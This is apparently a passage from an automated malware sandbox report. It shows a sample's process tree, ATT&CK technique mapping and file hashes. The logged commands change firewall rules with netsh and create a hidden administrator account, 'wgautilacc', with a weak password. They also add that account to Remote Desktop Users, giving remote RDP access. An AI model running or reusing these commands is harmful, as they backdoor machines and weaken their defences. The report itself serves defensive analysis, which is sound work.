- Suspicious use of WriteProcessMemory
PID:5140 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5924
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5164 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=3389 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5708
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5576 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port reconnecting" protocol="TCP" localport=5939 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5460 -
C:\Windows\SysWOW64\net.exenet user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5412 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "wgautilacc" "1234" /add /active:yes /comment:"DefaultUser" /expires:never5⤵
- System Location Discovery: System Language Discovery
PID:5388
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup "Administrators" "wgautilacc" /add & net localgroup "Remote Desktop Users" "wgautilacc" /add3⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5356 -
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" "wgautilacc" /add4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5308 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "wgautilacc" /add5⤵
- System Location Discovery: System Language Discovery
PID:5288
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" "wgautilacc" /add4⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5284 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" "wgautilacc" /add5⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:5252
-
-
-
-
-
C:\Program Files\Defragmentation\abashed.exe"C:\Program Files\Defragmentation\abashed.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:5724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5668
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Users
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Discovery
Permission Groups Discovery
1Local Groups
1Query Registry
1System Information Discovery
2System Location Discovery
1System Language Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12.3MB
MD5ceead38e6521ea6bcf26c3cf266baec7
SHA1d7523a46243b459deb53663e5bfa5a85cb760ff0
SHA2568c62370f1ff4d32794b8b554ae75a3c3b457561542ed9795c1819bbb6746599b
SHA5120691bcf9b29fb996ab02c8a184900d8b10c1475519dbc66d331dd2ea0fcd6a82957e129b7edc440a23145f24cf4fa0eb433388477939e58f7186527febccf0ab
-
Filesize
1.3MB
MD54cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA51246cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb
-
Filesize
337KB
MD55c268ca919854fc22d85f916d102ee7f
SHA10957cf86e0334673eb45945985b5c033b412be0e
SHA2561f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA51276d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310
-
Filesize
569KB
MD5a46ab91afbba2a657bce8e961bf2632f
SHA17c1a484a381fc4915c6904358f7a3611ad9323d2
SHA256740b1c1498915271214824fa1c5f1a373efdcf13adee853f70d582cec353a1a1
SHA512a1a519c05dea2ab7db4dcea2945c6afb5292d1701404b0de7c530df13ffe81db986fd9c7d703225178f9df4468c17c9db0a78029ae87112e35c51490576a17c4
-
Filesize
1.5MB
MD59adce164113ec09d243a78029aecfa2e
SHA1403fb3148345800ca6f0374459e3f6d5ef3b613e
SHA256d577804cf39a7af100747f2dcc00c525a19fa3cb0498885d020cc2a0f10a9436
SHA512c938ccc8b89181e2d5113f31e4adc532b0c62793ba3549dbc7ece22a30219d4f0885e89b1ac01499bed5ea1dd653cbee3b61bdb0883d9980ea4c518ac70b01f5
-
Filesize
105KB
MD54b0617493f32b2b5fe5e838eeb885819
SHA1336e84380420a9caaa9c12af7c8e530135e63c57
SHA256df3621f83e9d11be45e0e617b899c4ab0241f60ed56494e892dc449482058402
SHA5125c50cf97cd9a6c699ec7928a08f77f4eaa68105e87a974432e39b637f926f0df8a95ec19bd63465fc438a4ef6349398938bc8d7651de125d13ccab89d1d49143
-
Filesize
12KB
MD58cf2ac271d7679b1d68eefc1ae0c5618
SHA17cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA2566950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3
-
Filesize
4KB
MD5f0438a894f3a7e01a4aae8d1b5dd0289
SHA1b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA25630c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7
-
Filesize
24KB
MD52b7007ed0262ca02ef69d8990815cbeb
SHA12eabe4f755213666dbbbde024a5235ddde02b47f
SHA2560b25b20f26de5d5bd795f934c70447112b4981343fcb2dfab3374a4018d28c2d
SHA512aa75ee59ca0b8530eb7298b74e5f334ae9d14129f603b285a3170b82103cfdcc175af8185317e6207142517769e69a24b34fcdf0f58ed50a4960cbe8c22a0aca
-
Filesize
6KB
MD5293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19